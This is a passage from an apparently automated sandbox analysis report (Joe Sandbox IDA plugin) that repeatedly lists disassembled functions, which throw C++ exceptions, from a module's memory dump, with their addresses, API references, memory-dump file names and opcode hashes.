Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE3472D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE34726

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: f273b301d4b70260fc933725da1c805f45fc136ac5c5a1967b9b937baf278089
Instruction ID: 56638fb3ee47db45e5210494d9009578ad4eb17fd4d5c018c076b8035b6abdf4
Opcode Fuzzy Hash: f273b301d4b70260fc933725da1c805f45fc136ac5c5a1967b9b937baf278089
Instruction Fuzzy Hash: 7DF062728002045FD304DF55D8419DA7BF89F15304B10C16AD80D57750EB30A504CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE367F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE36818

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE3682D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE36826

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: bbcb816964bf12f147cc5ea1a9dbbf4d00e5d3d5091c1d29a6d118a8d0c848af
Instruction ID: 3f8d2dfd27dbaf60cf4495b84beb952cd817ea323371f6ec61b794b38a70018c
Opcode Fuzzy Hash: bbcb816964bf12f147cc5ea1a9dbbf4d00e5d3d5091c1d29a6d118a8d0c848af
Instruction Fuzzy Hash: 98F09072800208AFD704DF99D9429DA77F8AF14304B20C26EDC0D97B60EB30FA04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE541B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE541D8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE541ED

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE541E6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: d9ceb6c64c4082733d1a29be40e7966ec2d10151239a675ab48788a24ff59653
Instruction ID: 52829a5b338028df89fd107cad093d87146f9831f6da9b0b372f1d37cde660fe
Opcode Fuzzy Hash: d9ceb6c64c4082733d1a29be40e7966ec2d10151239a675ab48788a24ff59653
Instruction Fuzzy Hash: 53F09072800208AFD304DF99D9429DA77F8AF15304B20C26ED8099BB60EB31EA14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE342D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE342F8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE3430D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE34306

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 92d1665bd3b396b52c4e31c1a968037fb5c965e257a31d2660b5d236b1010b10
Instruction ID: 31a22b7c97bd45c25da36f04216980c028b98a80e48389ae82b1e723f6d315c4
Opcode Fuzzy Hash: 92d1665bd3b396b52c4e31c1a968037fb5c965e257a31d2660b5d236b1010b10
Instruction Fuzzy Hash: EEF0BBB28042049FD704DF55D9419DA7BF89F05304F10C16ED80D6B750EB30F504CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE34240 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE34268

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE3427D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE34276

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 24f667bedd1022e60f0f939e49f226196e525c610ba60b84d4e54419d2aaff76
Instruction ID: 26a54755135128d8e593a344b68f0bccfcf06aaab4c80fd3626e8fb9c4e6940a
Opcode Fuzzy Hash: 24f667bedd1022e60f0f939e49f226196e525c610ba60b84d4e54419d2aaff76
Instruction Fuzzy Hash: 8BF096728002085FD304DF99D8429DA7BF89F04304F10C26ED80D57750EB30FA04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE34360 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE34388

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE3439D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE34396

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: fd7bb7f3fb352095f4c60b01ec7d537174951aeabf38298d39b1974abd5bab19
Instruction ID: d078f3a74961706f4309de1b3df7420f4021dfb591c8c692bd553c33fb687a90
Opcode Fuzzy Hash: fd7bb7f3fb352095f4c60b01ec7d537174951aeabf38298d39b1974abd5bab19
Instruction Fuzzy Hash: 2CF0BB728142045FD304DF55D9419DA7BF89F04304F10C16ED80D5B760EB30F504CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4DD50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE4DD78

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE4DD8D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE4DD86

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: b0cbcf027ee492fb8780411c381a5587a2edc7c18105f671c3911e7e5590bbd6
Instruction ID: bf23b0aa8aff81573fede64d385a66d5075b8c666909055ce81f0a24673eddf4
Opcode Fuzzy Hash: b0cbcf027ee492fb8780411c381a5587a2edc7c18105f671c3911e7e5590bbd6
Instruction Fuzzy Hash: 79F05BB69142086FD704DF55D5419DA7BF89F15344F14C2AED80D57750FB30E604CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6CE45BB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE45BD8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE45BED

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE45BE6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: db275f078563e2134312cab403455c3e4084e51cc24136d4bc3ad630565cb185
Instruction ID: db017069e71d99c0af17c5a1b3cee96c21c06aeb1cfe4407a46d0a94bb1f96bf
Opcode Fuzzy Hash: db275f078563e2134312cab403455c3e4084e51cc24136d4bc3ad630565cb185
Instruction Fuzzy Hash: FDF0BB72C012045FD304DF99E841DDAB7F89F04344F10C16ED80997750EB30E604CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3ADE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE3AE08

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE3AE1D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE3AE16

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 600653970e37c09df3708a46777d18cb02d30e784ed39be823b08fd6bb64b3c0
Instruction ID: 5bc2609900c65901c8fa7e7adae4967168d94ed34c876cf8ca9889de7b9430e4
Opcode Fuzzy Hash: 600653970e37c09df3708a46777d18cb02d30e784ed39be823b08fd6bb64b3c0
Instruction Fuzzy Hash: 76F089728111086FD704DF99E9019DA77B89F15344F10C16AD80957B50EB70FA44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE34D70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE34D98

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE34DAD

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE34DA6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: e65dcf5e88a3dcf8acb66ce0c9ca73b14b76cfa9e91ea4321e0d0f609eabb675
Instruction ID: ea948ced4d3efe5c07cf6842168edd0a990c9f9376d52ffea6b9f6c96943c987
Opcode Fuzzy Hash: e65dcf5e88a3dcf8acb66ce0c9ca73b14b76cfa9e91ea4321e0d0f609eabb675
Instruction Fuzzy Hash: 67F082728102086BD700DF99D9029DA7BF8AF15344F60C26AE909A7B50EB30E608CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE34E80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE34EA8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE34EBD

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE34EB6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 206447edb5fc756de7464a63c4cee36232913f75021e98ba67000490d3d2b5b8
Instruction ID: 6ac02783393d342bd9dc866a743a4eaba8b5f2d815cb9755790fd53d69fd4a2e
Opcode Fuzzy Hash: 206447edb5fc756de7464a63c4cee36232913f75021e98ba67000490d3d2b5b8
Instruction Fuzzy Hash: 87F08972D101086BD700DF99D9019DA7BF89F15344F10C26AD9096B750EB70FA08CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3AE50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE3AE78

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE3AE8D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE3AE86

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 2d0848388d58d026cd22eab2f7905a58abded8cfb975a59bd6313a5d9aa1b6fc
Instruction ID: ca53c42a634ce0c40236eaadb640df45bb71da30215039f3756927f32b621782
Opcode Fuzzy Hash: 2d0848388d58d026cd22eab2f7905a58abded8cfb975a59bd6313a5d9aa1b6fc
Instruction Fuzzy Hash: E0F08972C102086BD704DF99D9019DB77B89F15344F10C16ED80D57B50EB70EA44CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE34E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE34E28

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE34E3D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE34E36

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
